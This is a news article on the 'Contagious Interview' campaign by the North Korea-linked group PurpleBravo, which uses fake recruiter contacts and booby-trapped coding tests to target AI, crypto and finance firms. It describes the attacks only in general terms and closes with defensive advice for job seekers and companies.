Job interview turns out to be a North Korean hacker trap! PurpleBravo has infiltrated over 3,100 IP addresses, with AI and cryptocurrency companies becoming the biggest targets.

Cybercriminal groups linked to North Korea have recently launched a new wave of cyberattacks, using fake job interviews and technical recruitment processes to infiltrate global AI, cryptocurrency, and financial services companies. Over 3,100 IP addresses have been affected, indicating an increasing scale and sophistication of their operations.

According to the latest research from Insikt Group, a threat intelligence division of Recorded Future, this operation is led by a hacker team known as PurpleBravo. The group is believed to be associated with North Korea’s cyber units and has been involved in multiple cryptocurrency thefts over the past year, accumulating illicit gains worth billions of dollars.

Fake interviews, real attacks: job application processes become infiltration gateways

Cybersecurity researchers point out that PurpleBravo employs a method called “Contagious Interview,” where hackers impersonate recruiters from tech or crypto companies, proactively reaching out to engineers and developers to invite them to technical interviews.

During these interviews, victims are often asked to review code, clone GitHub repositories, or perform specific development tasks. However, these seemingly normal tests conceal malicious code. Once executed on a company’s computer, it can allow hackers to gain further system access, posing risks not only to individual accounts but potentially spreading throughout the organization’s internal network.

Attacks span multiple regions, with tech and finance as primary targets

Insikt Group reports that during the monitoring period, at least 3,136 IP addresses were targeted, with over 20 organizations confirmed as victims, located across South Asia, North America, Europe, the Middle East, and Central America.

The research indicates that these attacks particularly favor industries with large data holdings and frequent fund flows, including AI R&D firms, cryptocurrency trading platforms, and financial service providers. This suggests that the hackers’ objectives extend beyond data theft to include asset theft or long-term infiltration.

Multiple fake identities and malicious tools, tactics continuously evolving

Cybersecurity units have also discovered that the operation employs multiple fake identities, often claiming to be from Ukraine, and contacts job seekers via platforms like GitHub, LinkedIn, and Upwork to enhance credibility. Behind the scenes, various cross-platform malware are used to steal browser credentials, cookies, and even facilitate remote control.

Additionally, researchers warn that hackers have started to exploit “modified” development tools, such as backdoored Visual Studio Code projects. Once users trust and open these projects, malicious commands may execute unknowingly.

Experts warn: vigilance needed in job and development processes

Cybersecurity experts advise that as remote work and online recruitment become the norm, hackers are actively weaponizing the “job application process.” Engineers and companies should carefully verify the authenticity of unfamiliar recruitment invitations, code tests, or project collaborations. Avoid executing unverified code on corporate devices to reduce the risk of organizational-level attacks.